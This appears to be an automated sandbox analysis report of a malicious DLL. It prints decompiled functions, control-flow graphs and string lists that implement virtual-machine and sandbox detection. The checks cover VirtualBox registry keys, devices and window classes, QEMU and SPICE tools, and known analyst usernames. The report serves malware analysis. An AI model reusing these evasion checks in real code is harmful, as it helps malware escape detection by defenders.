                                        control_flow_graph 787 1c33871f9c0-1c33871f9ed call 1c3387211c0 790 1c33871fc43-1c33871fc4d 787->790 791 1c33871f9f3-1c33871fa33 call 1c3388445f8 * 2 787->791 796 1c33871fa35-1c33871fa38 791->796 797 1c33871fa8a-1c33871fa92 791->797 800 1c33871fa3a-1c33871fa56 796->800 801 1c33871fa81-1c33871fa84 SysFreeString 796->801 798 1c33871fa94-1c33871fa97 SysFreeString 797->798 799 1c33871fa9d-1c33871faaa 797->799 798->799 802 1c33871fc33-1c33871fc42 799->802 803 1c33871fab0-1c33871fabf 799->803 806 1c33871fa60-1c33871fa62 800->806 801->797 804 1c33871fac5-1c33871facf 803->804 805 1c33871fc13-1c33871fc2d CoUninitialize 803->805 808 1c33871fad0-1c33871fae3 804->808 805->802 806->801 807 1c33871fa64-1c33871fa7b CoUninitialize 806->807 807->801 811 1c33871fae9-1c33871faed 808->811 813 1c33871faf3-1c33871fb17 811->813 814 1c33871fc0f 811->814 818 1c33871fb19-1c33871fb21 813->818 819 1c33871fb48-1c33871fb6c 813->819 814->805 818->819 820 1c33871fb23-1c33871fb25 818->820 825 1c33871fb9d-1c33871fbc1 819->825 826 1c33871fb6e-1c33871fb76 819->826 821 1c33871fb27-1c33871fb3a call 1c33880e5b0 820->821 822 1c33871fb3e-1c33871fb42 VariantClear 820->822 821->822 822->819 832 1c33871fbc3-1c33871fbcb 825->832 833 1c33871fbf2-1c33871fbfe 825->833 826->825 828 1c33871fb78-1c33871fb7a 826->828 830 1c33871fb93-1c33871fb97 VariantClear 828->830 831 1c33871fb7c-1c33871fb8f call 1c33880e5b0 828->831 830->825 831->830 832->833 835 1c33871fbcd-1c33871fbcf 832->835 833->814 841 1c33871fc00-1c33871fc07 833->841 837 1c33871fbe8-1c33871fbec VariantClear 835->837 838 1c33871fbd1-1c33871fbe4 call 1c33880e5b0 835->838 837->833 838->837 841->808 843 1c33871fc0d 841->843 843->805
                                        C-Code - Quality: 21%
                                        			E000001C31C33871F9C0(void* __edx, void* __rax, long long __rdi, long long __rsi, long long __r12, long long __r14, char _a8, void* _a16, void* _a24, void* _a32) {
                                        				long long _v32;
                                        				long long _v40;
                                        				long long _v48;
                                        				long long _v56;
                                        				intOrPtr _v72;
                                        				signed int _v80;
                                        				void* _v88;
                                        				long long _v96;
                                        				long long _v104;
                                        				void* __rbx;
                                        				void* _t71;
                                        				void* _t72;
                                        				signed char _t78;
                                        				signed char _t81;
                                        				signed char _t84;
                                        				void* _t94;
                                        				void* _t128;
                                        				intOrPtr* _t137;
                                        				long long _t167;
                                        				void* _t180;
                                        				long long _t185;
                                        
                                        				_t167 = __rsi;
                                        				r15d = 0;
                                        				_a32 = _t185;
                                        				_v88 = _t185;
                                        				_a24 = _t185;
                                        				_t72 = E000001C31C3387211C0(_t71,  &_a32,  &_v88, __rsi); // executed
                                        				if (_t72 == 0) goto 0x3871fc43;
                                        				_v32 = _t167;
                                        				_v40 = __rdi;
                                        				_v48 = __r12;
                                        				_v56 = __r14;
                                        				__imp__#2();
                                        				__imp__#2();
                                        				r12d = 1;
                                        				r14d = r12d;
                                        				if (__rax == 0) goto 0x3871fa8a;
                                        				if (__rax == 0) goto 0x3871fa81;
                                        				_v96 =  &_a24;
                                        				_t13 = _t185 + 0x30; // 0x30
                                        				r9d = _t13;
                                        				_v104 = _t185;
                                        				_t179 =  *_a32;
                                        				if ( *((intOrPtr*)( *_a32 + 0xa0))() >= 0) goto 0x3871fa81;
                                        				r14d = r15d;
                                        				 *((intOrPtr*)( *_a32 + 0x10))();
                                        				 *((intOrPtr*)( *_v88 + 0x10))();
                                        				__imp__CoUninitialize();
                                        				__imp__#6();
                                        				if (__rax == 0) goto 0x3871fa9d;
                                        				__imp__#6();
                                        				if (r14d == 0) goto 0x3871fc33;
                                        				_t137 = _a24;
                                        				_a16 = _t185;
                                        				_a8 = r15d;
                                        				if (_t137 == 0) goto 0x3871fc13;
                                        				asm("o16 nop [eax+eax]");
                                        				_v104 =  &_a8;
                                        				r8d = r12d; // executed
                                        				 *((intOrPtr*)( *_t137 + 0x20))();
                                        				if (_a8 == r15d) goto 0x3871fc0f;
                                        				_v96 = _t185;
                                        				r8d = 0;
                                        				_v104 = _t185;
                                        				if ( *((intOrPtr*)( *_a16 + 0x20))() < 0) goto 0x3871fb48;
                                        				_t78 = _v80 & 0x0000ffff;
                                        				if (_t78 == r12w) goto 0x3871fb48;
                                        				if ((_t78 & 0x00000008) == 0) goto 0x3871fb3e;
                                        				E000001C31C33880E5B0(_t128, _v72, L"VBOX", _v32,  *_a32, _t180);
                                        				_t92 =  !=  ? r12d : r15d;
                                        				__imp__#9();
                                        				_v96 = _t185;
                                        				r8d = 0;
                                        				_v104 = _t185;
                                        				if ( *((intOrPtr*)( *_a16 + 0x20))() < 0) goto 0x3871fb9d;
                                        				_t81 = _v80 & 0x0000ffff;
                                        				if (_t81 == r12w) goto 0x3871fb9d;
                                        				if ((_t81 & 0x00000008) == 0) goto 0x3871fb93;
                                        				E000001C31C33880E5B0(_t128, _v72, L"VBOX", _v32,  *_a32, _t180);
                                        				_t93 =  !=  ? r12d :  !=  ? r12d : r15d;
                                        				__imp__#9();
                                        				_v96 = _t185;
                                        				r8d = 0;
                                        				_v104 = _t185;
                                        				if ( *((intOrPtr*)( *_a16 + 0x20))() < 0) goto 0x3871fbf2;
                                        				_t84 = _v80 & 0x0000ffff;
                                        				if (_t84 == r12w) goto 0x3871fbf2;
                                        				if ((_t84 & 0x00000008) == 0) goto 0x3871fbe8;
                                        				E000001C31C33880E5B0(_t128, _v72, L"VEN_VBOX", _v32, _t179, _t180);
                                        				_t94 =  !=  ? r12d :  !=  ? r12d :  !=  ? r12d : r15d;
                                        				__imp__#9();
                                        				 *((intOrPtr*)( *_a16 + 0x10))();
                                        				if (_t94 != 0) goto 0x3871fc0f;
                                        				if (_a24 != 0) goto 0x3871fad0;
                                        				goto 0x3871fc13;
                                        				 *((intOrPtr*)( *_a24 + 0x10))();
                                        				 *((intOrPtr*)( *_a32 + 0x10))();
                                        				 *((intOrPtr*)( *_v88 + 0x10))();
                                        				__imp__CoUninitialize(); // executed
                                        				return _t94;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String$ClearVariantwcsstr$AllocFreeUninitialize$Initialize
                                        • String ID: Caption$Name$PNPDeviceID$SELECT * FROM Win32_PnPDevice$VBOX$VEN_VBOX$WQL
                                        • API String ID: 2434920835-607120894
                                        • Opcode ID: 18a9160383bfad2217a0f6765ca1bb4c33e7fa5d24e15252037a2e59ca21f0ed
                                        • Instruction ID: 2e4baa18078e4cf99ad69895c0cd51a4175a2598fcc3c0dc4e51517979913f5b
                                        • Opcode Fuzzy Hash: 18a9160383bfad2217a0f6765ca1bb4c33e7fa5d24e15252037a2e59ca21f0ed
                                        • Instruction Fuzzy Hash: 6B815A76341B9086FB20DF25E854ADD37A1FB84B88F44A516EE6A47F58DF38C686C301
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        C-Code - Quality: 16%
                                        			E000001C31C33871E2E0(long long __rbx, long long __rsi, long long _a8, long long _a16) {
                                        				void* _v8;
                                        				signed long long _v24;
                                        				char _v536;
                                        				long long _v552;
                                        				long long _v560;
                                        				long long _v568;
                                        				long long _v576;
                                        				long long _v584;
                                        				long long _v592;
                                        				long long _v600;
                                        				long long _v608;
                                        				long long _v616;
                                        				char _v632;
                                        				long long _v648;
                                        				void* __rdi;
                                        				long _t27;
                                        				void* _t32;
                                        				void* _t35;
                                        				void* _t37;
                                        				signed long long _t41;
                                        				void* _t62;
                                        				void* _t64;
                                        				void* _t68;
                                        				void* _t71;
                                        
                                        				_a8 = __rbx;
                                        				_a16 = __rsi;
                                        				_t41 =  *0x38903000; // 0x9bfaf736ae76
                                        				_v24 = _t41 ^ _t68 - 0x000002a0;
                                        				_v616 = L"HARDWARE\\ACPI\\DSDT\\VBOX__";
                                        				_v608 = L"HARDWARE\\ACPI\\FADT\\VBOX__";
                                        				_v600 = L"HARDWARE\\ACPI\\RSDT\\VBOX__";
                                        				_v592 = L"SOFTWARE\\Oracle\\VirtualBox Guest Additions";
                                        				_v584 = L"SYSTEM\\ControlSet001\\Services\\VBoxGuest";
                                        				_v576 = L"SYSTEM\\ControlSet001\\Services\\VBoxMouse";
                                        				_v568 = L"SYSTEM\\ControlSet001\\Services\\VBoxService";
                                        				_v560 = L"SYSTEM\\ControlSet001\\Services\\VBoxSF";
                                        				_v552 = L"SYSTEM\\ControlSet001\\Services\\VBoxVideo";
                                        				asm("o16 nop [eax+eax]");
                                        				r8d = 0x200;
                                        				E000001C31C33880E410(_t32, 0, _t35, _t37,  &_v536, _t62, _t64, _t71);
                                        				0x3871e130();
                                        				_v632 = __rsi;
                                        				r9d = 0x20019;
                                        				_v648 =  &_v632;
                                        				r8d = 0;
                                        				_t27 = RegOpenKeyExW(??, ??, ??, ??, ??); // executed
                                        				if (_t27 == 0) goto 0x3871e3ef;
                                        				if (__rbx + 1 - 9 < 0) goto 0x3871e380;
                                        				goto 0x3871e3ff;
                                        				RegCloseKey(??);
                                        				E000001C31C33880C290();
                                        				return 1;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpen
                                        • String ID: Checking reg key %s $HARDWARE\ACPI\DSDT\VBOX__$HARDWARE\ACPI\FADT\VBOX__$HARDWARE\ACPI\RSDT\VBOX__$SOFTWARE\Oracle\VirtualBox Guest Additions$SYSTEM\ControlSet001\Services\VBoxGuest$SYSTEM\ControlSet001\Services\VBoxMouse$SYSTEM\ControlSet001\Services\VBoxSF$SYSTEM\ControlSet001\Services\VBoxService$SYSTEM\ControlSet001\Services\VBoxVideo
                                        • API String ID: 47109696-1723177289
                                        • Opcode ID: 7c38387bba371d1f9531227918788e45451f020520461cd3ce23ee421c54f2a7
                                        • Instruction ID: 0d31c83bba7c667b62dc84805a046794932fbc0237bf8b80c622e43f15417f9e
                                        • Opcode Fuzzy Hash: 7c38387bba371d1f9531227918788e45451f020520461cd3ce23ee421c54f2a7
                                        • Instruction Fuzzy Hash: 26311736255BC096FA519B15F484BCAB3A8F788780F50A227DEAD47B68DF38C254CB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1179 1c3386e9070 1180 1c3386e9070 call 1c338811c60 1179->1180 1181 1c3386e9075-1c3386e90aa Sleep SleepEx 1180->1181 1181->1179 1182 1c3386e90ac-1c3386e9122 ExitProcess 1181->1182 1183 1c3386e912d-1c3386e9135 1182->1183 1184 1c3386e9151 call 1c33871dc50 1183->1184
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep$ExitObjectProcessSingleWait
                                        • String ID: 2104a$3C29FEA2-6FE8-4BF9-B98A-0E3442115F67$BLACK
                                        • API String ID: 620895886-100088877
                                        • Opcode ID: af6207a73a3482f1afac7967fe309dd331fc75ebf2ebde154b395dcd4d382960
                                        • Instruction ID: 3c15c5d3f6a131b63c7aa63e49fe743f473246f214bf31d8dedf4c7ed7549599
                                        • Opcode Fuzzy Hash: af6207a73a3482f1afac7967fe309dd331fc75ebf2ebde154b395dcd4d382960
                                        • Instruction Fuzzy Hash: 78517E72251BC08AF7749F34A855BDA36A5FB41728F40A71ADAB50AEE5CF38C354C702
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Initialize$CreateInstanceSecurityUninitialize
                                        • String ID: ROOT\CIMV2
                                        • API String ID: 374467530-2786109267
                                        • Opcode ID: cde58bd1f11807151f71f409ee3618f128b570f62afd7fce95148d0cbc5f49ce
                                        • Instruction ID: 93ab2bd4cd7822afec204f089e1dbd29b8c3dba6a7bef2ca4579b2ffceaa9a1b
                                        • Opcode Fuzzy Hash: cde58bd1f11807151f71f409ee3618f128b570f62afd7fce95148d0cbc5f49ce
                                        • Instruction Fuzzy Hash: 09417132748B8486F750CF25F444B8E77A1F788B84F149116EEAA87B58DF38D295CB01
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 34%
                                        			E000001C31C33871FE00(long long __rbx, long long __rsi, long long __rbp, void* __r9, long long _a8, long long _a16, long long _a24) {
                                        				void* _v8;
                                        				signed long long _v24;
                                        				char _v536;
                                        				void* _v1064;
                                        				char _v1592;
                                        				long long _v1608;
                                        				long long _v1616;
                                        				intOrPtr _v1624;
                                        				void* __rdi;
                                        				signed char _t29;
                                        				void* _t31;
                                        				void* _t38;
                                        				void* _t41;
                                        				signed long long _t48;
                                        				void* _t63;
                                        				void* _t68;
                                        				void* _t75;
                                        				void* _t78;
                                        				void* _t81;
                                        
                                        				_t81 = __r9;
                                        				_a16 = __rbp;
                                        				_a24 = __rsi;
                                        				_t48 =  *0x38903000; // 0x9bfaf736ae76
                                        				_v24 = _t48 ^ _t75 - 0x00000670;
                                        				r8d = 0x208;
                                        				E000001C31C33880E410(_t31, 0, _t38, _t41,  &_v1592, _t63, _t68, _t78);
                                        				_a8 = __rbx;
                                        				_v1616 = L"qemu-ga";
                                        				_v1608 = L"SPICE Guest Tools";
                                        				asm("o16 nop [eax+eax]");
                                        				r8d = 0x200;
                                        				E000001C31C33880E410(_t31, 0, 0, _t41,  &_v536, _t63, _t68, _t78);
                                        				_v1624 = 0;
                                        				if ( *0x38904490 == 8) goto 0x3871ff49;
                                        				if (1 - 0x1e < 0) goto 0x3871fe91;
                                        				r9d = 0;
                                        				_t11 = _t81 + 0x26; // 0x26
                                        				r8d = _t11;
                                        				__imp__SHGetSpecialFolderPathW();
                                        				__imp__PathCombineW();
                                        				0x3871e130();
                                        				_t29 = GetFileAttributesW(??); // executed
                                        				if (_t29 == 0xffffffff) goto 0x3871ff0d;
                                        				if ((_t29 & 0x00000010) != 0) goto 0x3871ffc8;
                                        				if (_t68 + 1 - 2 < 0) goto 0x3871fe70;
                                        				E000001C31C33880C290();
                                        				return 0;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Path$AttributesCombineCurrentEnvironmentExpandFileFolderProcessSpecialStrings
                                        • String ID: %ProgramW6432%$Checking QEMU directory %s $SPICE Guest Tools$qemu-ga
                                        • API String ID: 3908115579-2146621234
                                        • Opcode ID: cddd45ac548655ee25877be52d59947d54e96f6af9043e306f26cc9488fc13fa
                                        • Instruction ID: a31dbf37bbcf62ae5865b7c30ff4d97f7d6d2b0618017dee376fcec2a956a2b0
                                        • Opcode Fuzzy Hash: cddd45ac548655ee25877be52d59947d54e96f6af9043e306f26cc9488fc13fa
                                        • Instruction Fuzzy Hash: 4D41A572264AC486FB208F14E448BDE7366F789B84F849227DA6D47B65CF38C746C741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$Process$AdaptersAllocFreeInfo
                                        • String ID:
                                        • API String ID: 2824440793-0
                                        • Opcode ID: cb8fe06dabd72fa1b03e3663e6c92b7a4a3ca4949d70821c1c2e72601d651c16
                                        • Instruction ID: e227301c80fc19c5c00fb1acb7cd65fc5f850e973b945a561226444b96e75910
                                        • Opcode Fuzzy Hash: cb8fe06dabd72fa1b03e3663e6c92b7a4a3ca4949d70821c1c2e72601d651c16
                                        • Instruction Fuzzy Hash: 8C31E83264ABD082FB648B16B4146A967A1F789B90F08E036DF6907755EE3CD7C0C712
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateFileHandle
                                        • String ID: Checking device %s $\\.\VBoxGuest$\\.\VBoxMiniRdrDN$\\.\VBoxTrayIPC$\\.\pipe\VBoxMiniRdDN$\\.\pipe\VBoxTrayIPC
                                        • API String ID: 3498533004-4225997269
                                        • Opcode ID: 56ed62d2cf7a837129290d8eac05861c9cde84ab61e432c1682e0b6220b0c953
                                        • Instruction ID: 195f076d97145139774eb9caf0bc3c4cffe45ae9187aac134c885dd46fb22919
                                        • Opcode Fuzzy Hash: 56ed62d2cf7a837129290d8eac05861c9cde84ab61e432c1682e0b6220b0c953
                                        • Instruction Fuzzy Hash: B8217136258B8086FB508F14F4447CA73A4F388790F90A626DEBC07BA4DF38C645CB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process32$CloseHandleNext$CreateFirstSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 3656348920-0
                                        • Opcode ID: 9c1d27ace35d54a340b9e4870039b04d238f8d5043f3ec788ee57e3bdf85d9d7
                                        • Instruction ID: 8446b75bf015cc34b5c18c6ce04c7453e3120fc34ae4d7c63aa0d6323533ea87
                                        • Opcode Fuzzy Hash: 9c1d27ace35d54a340b9e4870039b04d238f8d5043f3ec788ee57e3bdf85d9d7
                                        • Instruction Fuzzy Hash: 422145323456C082FB60CB25F858BAA63A2F788BD4F459622D9794B694EF3CD744C711
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 44%
                                        			E000001C31C33871DCE2(signed int __edi, signed int __ebp, long long __rax, void* _a32, void* _a48, void* _a56, void* _a64) {
                                        				_Unknown_base(*)()* _t57;
                                        				void* _t58;
                                        				void* _t59;
                                        				void* _t60;
                                        				void* _t61;
                                        				void* _t62;
                                        				void* _t63;
                                        				void* _t66;
                                        				void* _t67;
                                        				void* _t68;
                                        				void* _t69;
                                        				void* _t70;
                                        				void* _t71;
                                        				void* _t72;
                                        				void* _t73;
                                        				void* _t74;
                                        				void* _t75;
                                        				void* _t76;
                                        				void* _t77;
                                        				void* _t78;
                                        				void* _t79;
                                        				void* _t80;
                                        				void* _t82;
                                        				void* _t83;
                                        				void* _t84;
                                        				void* _t85;
                                        				void* _t86;
                                        				void* _t87;
                                        				void* _t88;
                                        				signed int _t90;
                                        				signed int _t99;
                                        				signed int _t159;
                                        				signed int _t161;
                                        				signed int _t167;
                                        				void* _t191;
                                        				long long _t192;
                                        				_Unknown_base(*)()* _t193;
                                        				void* _t197;
                                        				void* _t212;
                                        				void* _t213;
                                        				void* _t218;
                                        				void* _t221;
                                        				void* _t223;
                                        				void* _t224;
                                        				void* _t225;
                                        				long long _t229;
                                        				signed int _t230;
                                        				signed long long _t239;
                                        				long long _t241;
                                        				long long _t243;
                                        				void* _t247;
                                        				void* _t248;
                                        				void* _t249;
                                        				void* _t250;
                                        
                                        				_t229 = __rax;
                                        				_t161 = __edi;
                                        				goto 0x3871dcfe;
                                        				_t57 = GetProcAddress(??, ??);
                                        				_t192 = __rax;
                                        				0x38720190(); // executed
                                        				_t193 = _t57;
                                        				sil = _t193 == 0;
                                        				if (_t193 == 0) goto 0x3871df24; // executed
                                        				_t58 = E000001C31C33871E190(_t159, _t230, _t239, _t241); // executed
                                        				_t59 = E000001C31C33871E2E0(_t230, _t241); // executed
                                        				_t99 = (__edi & 0xffffff00 | _t58 == 0x00000000) & __edi & ((__edi & 0xffffff00 | _t192 != 0x00000000) ^ 0x00000001) & __ebp & (__edi & 0xffffff00 | _t59 == 0x00000000); // executed
                                        				_t60 = E000001C31C33871E430(_t230, _t239, _t241); // executed
                                        				_t61 = E000001C31C33871E6A0(_t247); // executed
                                        				_t197 = _t61;
                                        				bpl = _t197 == 0;
                                        				if (_t197 == 0) goto 0x3871df24;
                                        				_t62 = E000001C31C338720FD0(_t229, _t230, 0x388b7ff8, _t241); // executed
                                        				sil = _t62 == 0;
                                        				_t63 = E000001C31C33871E7D0(_t230, _t241, _t243, _t247); // executed
                                        				_t167 = _t161 & _t161 & _t99 & (_t161 & 0xffffff00 | _t60 == 0x00000000) & (_t161 & 0xffffff00 | _t63 == 0x00000000);
                                        				FindWindowW(??, ??); // executed
                                        				_t231 = _t229; // executed
                                        				FindWindowW(??, ??); // executed
                                        				if (_t229 != 0) goto 0x3871dda8;
                                        				if (_t229 == 0) goto 0x3871ddad;
                                        				_t66 = E000001C31C33871E8F0(); // executed
                                        				_t67 = E000001C31C33871E990(_t231); // executed
                                        				_t68 = E000001C31C33871EA40(0, _t229, _t239, _t241, _t248, _t249); // executed
                                        				_t69 = E000001C31C33871EC20(0, _t231, _t239, _t241, _t249); // executed
                                        				0x3871ef30();
                                        				_t70 = E000001C31C33871EFD0(_t69, _t229);
                                        				_t71 = E000001C31C33871F520(0, _t229, _t231, _t241, _t249, _t250); // executed
                                        				_t72 = E000001C31C33871F730(0, _t229, _t239, _t241, _t248, _t249); // executed
                                        				_t73 = E000001C31C33871F120(0, _t229, _t239, _t241, _t248, _t249); // executed
                                        				_t74 = E000001C31C33871F300(0, _t229, _t231, _t241, _t249); // executed
                                        				_t75 = E000001C31C33871F9C0(0, _t229, _t239, _t241, _t248, _t249); // executed
                                        				_t212 = _t75;
                                        				if (_t212 == 0) goto 0x3871df24; // executed
                                        				_t76 = E000001C31C338720C70(_t231); // executed
                                        				_t213 = _t76;
                                        				sil = _t213 == 0;
                                        				if (_t213 == 0) goto 0x3871df24; // executed
                                        				_t77 = E000001C31C33871FC50(_t231, _t241); // executed
                                        				_t78 = E000001C31C33871FD40(_t231); // executed
                                        				_t79 = E000001C31C33871FE00(_t231, _t241, _t243, _t247); // executed
                                        				_t80 = E000001C31C338720070(_t161, _t191, _t229);
                                        				_t218 = E000001C31C33871FFE0(_t229, _t231, _t241);
                                        				sil = _t218 == 0;
                                        				if (_t218 == 0) goto 0x3871df24;
                                        				_t82 = E000001C31C338720250(_t231, _t241);
                                        				_t83 = E000001C31C338720370(_t231, _t239, _t241); // executed
                                        				_t84 = E000001C31C338720590(_t247); // executed
                                        				_t221 = _t84;
                                        				sil = _t221 == 0;
                                        				if (_t221 == 0) goto 0x3871df24; // executed
                                        				_t85 = E000001C31C338720BC0(_t231); // executed
                                        				_t86 = E000001C31C338720FD0(_t229, _t231, 0x388b8f18, _t241); // executed
                                        				_t223 = _t86;
                                        				sil = _t223 == 0;
                                        				if (_t223 == 0) goto 0x3871df24; // executed
                                        				_t87 = E000001C31C3387209C0(0, _t229, _t239, _t241, _t249); // executed
                                        				_t224 = _t87;
                                        				if (_t224 == 0) goto 0x3871df24; // executed
                                        				_t88 = E000001C31C338720770(); // executed
                                        				_t225 = _t88;
                                        				sil = _t225 == 0;
                                        				if (_t225 != 0) goto 0x3871df28;
                                        				goto 0x3871df38; // executed
                                        				_t90 = E000001C31C338720950(); // executed
                                        				dil = _t90 == 0;
                                        				return _t90 & 0xffffff00 | (_t161 & (_t161 & 0xffffff00 | _t224 == 0x00000000) & _t161 & (_t161 & 0xffffff00 | _t85 == 0x00000000) & _t161 & (_t161 & 0xffffff00 | _t82 == 0x00000000) & _t161 & (_t161 & 0xffffff00 | _t77 == 0x00000000) & _t161 & (_t161 & 0xffffff00 | _t212 == 0x00000000) & _t167 & (_t161 & 0xffffff00 | _t66 == 0x00000000) & 0 & (_t161 & 0xffffff00 | _t67 == 0x00000000) & (_t161 & 0xffffff00 | _t68 == 0x00000000) & (_t161 & 0xffffff00 | _t69 == 0x00000000) & (_t161 & 0xffffff00 | _t69 == 0x00000000) & (_t161 & 0xffffff00 | _t70 == 0x00000000) & (_t161 & 0xffffff00 | _t71 == 0x00000000) & (_t161 & 0xffffff00 | _t72 == 0x00000000) & (_t161 & 0xffffff00 | _t73 == 0x00000000) & (_t161 & 0xffffff00 | _t74 == 0x00000000) & (_t161 & 0xffffff00 | _t78 == 0x00000000) & (_t161 & 0xffffff00 | _t79 == 0x00000000) & (_t161 & 0xffffff00 | _t80 == 0x00000000) & (_t161 & 0xffffff00 | _t83 == 0x00000000) & _t161) == 0x00000000;
                                        			}

                                        APIs
                                          • Part of subcall function 000001C33871E2E0: RegOpenKeyExW.ADVAPI32 ref: 000001C33871E3D8
                                          • Part of subcall function 000001C33871E430: GetWindowsDirectoryW.KERNEL32 ref: 000001C33871E55D
                                          • Part of subcall function 000001C33871E430: Wow64DisableWow64FsRedirection.KERNEL32 ref: 000001C33871E571
                                          • Part of subcall function 000001C33871E430: PathCombineW.SHLWAPI ref: 000001C33871E590
                                          • Part of subcall function 000001C33871E430: GetFileAttributesW.KERNEL32 ref: 000001C33871E5CA
                                          • Part of subcall function 000001C33871E6A0: ExpandEnvironmentStringsW.KERNEL32 ref: 000001C33871E744
                                          • Part of subcall function 000001C33871E6A0: PathCombineW.SHLWAPI ref: 000001C33871E770
                                          • Part of subcall function 000001C33871E6A0: GetFileAttributesW.KERNEL32 ref: 000001C33871E77E
                                          • Part of subcall function 000001C338720FD0: GetProcessHeap.KERNEL32 ref: 000001C338720FEC
                                          • Part of subcall function 000001C338720FD0: HeapAlloc.KERNEL32 ref: 000001C338720FFD
                                          • Part of subcall function 000001C33871E7D0: CreateFileW.KERNEL32 ref: 000001C33871E869
                                        • FindWindowW.USER32 ref: 000001C33871DD84
                                        • FindWindowW.USER32 ref: 000001C33871DD96
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$AttributesCombineFindHeapPathWindowWow64$AllocCreateDirectoryDisableEnvironmentExpandOpenProcessRedirectionStringsWindows
                                        • String ID: VBoxTrayToolWnd$VBoxTrayToolWndClass
                                        • API String ID: 3985774531-1325860762
                                        • Opcode ID: 51dc2ca28e6fceea5886baf658b83979a18fae7bc906fc872d50bbb68b8c2bf5
                                        • Instruction ID: 23cf026aae8bc88e5c9d59f3432576e0e53794e5e1d4ac9a7b047ba3fea400de
                                        • Opcode Fuzzy Hash: 51dc2ca28e6fceea5886baf658b83979a18fae7bc906fc872d50bbb68b8c2bf5
                                        • Instruction Fuzzy Hash: 3A21CF737A2B9002FA6426354D85FDA1287BB84780F0DA63B6D359B6CAEE59CA010342
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: NameUser
                                        • String ID: Checking if username matches : %s $CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sandbox$maltest$malware$milozs$sand box$test user$timmy$virus
                                        • API String ID: 2645101109-2358638013
                                        • Opcode ID: f127e8f769bbdd4ab8cd243d58800cd5c42322d4f5f2d3b27f0b81df4fe1052e
                                        • Instruction ID: ad2b1ffbd838095418358125e8c82b1f8da2caf961afe91bfbd7b314381e8971
                                        • Opcode Fuzzy Hash: f127e8f769bbdd4ab8cd243d58800cd5c42322d4f5f2d3b27f0b81df4fe1052e
                                        • Instruction Fuzzy Hash: 4A413B35286FC095F6519B04F8887CA73A4F788780F446627DEAC0BB65EF78CA44CB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        C-Code - Quality: 26%
